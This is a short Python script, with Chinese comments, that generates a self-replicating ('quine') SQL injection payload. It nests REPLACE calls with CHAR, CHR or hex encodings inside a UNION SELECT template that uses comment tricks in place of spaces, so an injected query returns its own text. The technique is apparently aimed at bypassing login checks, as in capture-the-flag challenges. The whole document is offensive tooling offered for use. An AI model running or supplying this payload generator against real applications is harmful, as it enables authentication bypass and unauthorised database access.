# replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),replace_B的编码,'replace_A') # replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),replace_B的编码,"replace_B") class rep: replace_S = "" replace_A = "" replace_B = "" replace_charfuc = "" result = "" def reppay(self): self.replace_S = self.replace_S.replace("REPLACE_BASE", "REPLACE(replace_temp,char_B,'replace_A')") self.replace_S = self.replace_S.replace("replace_temp", "REPLACE('replace_A',tempchar_a,tempchar_b)") self.replace_A = self.replace_S.replace("'", '"') self.replace_A = self.replace_A.replace("replace_A", "replace_B") print("-" * 20) print("replace_S is " + self.replace_S) print("replace_A is " + self.replace_A) print("replace_B is " + self.replace_B) print("-" * 20) self.result = self.replace_S.replace("replace_A", self.replace_A) self.result = self.result.replace("replace_B", self.replace_B) temp = "" tempchar_a = "" tempchar_b = "" if self.replace_charfuc.lower() == "CHAR".lower(): temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")" tempchar_a = self.replace_charfuc + "(34)" tempchar_b = self.replace_charfuc + "(39)" elif self.replace_charfuc.lower() == "CHR".lower(): temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")" tempchar_a = self.replace_charfuc + "(34)" tempchar_b = self.replace_charfuc + "(39)" elif self.replace_charfuc.lower() == "0x".lower(): temp = self.replace_charfuc + str("".join(hex(ord(self.replace_B)).replace('0x', ''))) tempchar_a = self.replace_charfuc + "22" tempchar_b = self.replace_charfuc + "27" else: exit("ERROR replace_charfuc") self.result = self.result.replace("char_B", temp) self.result = self.result.replace("tempchar_a", tempchar_a) self.result = self.result.replace("tempchar_b", tempchar_b) print("payload is\n") print(self.result) payload = rep() payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#" # 需要构造的payload模板,REPLACE部分请用 REPLACE_BASE 代替 payload.replace_B = "B" # 替换过程中的单个字符,必须是单个字符 payload.replace_charfuc = "0x" # ANSI转字符用的函数,可以是0x、CHAR、CHR ,大小写都可以 payload.reppay()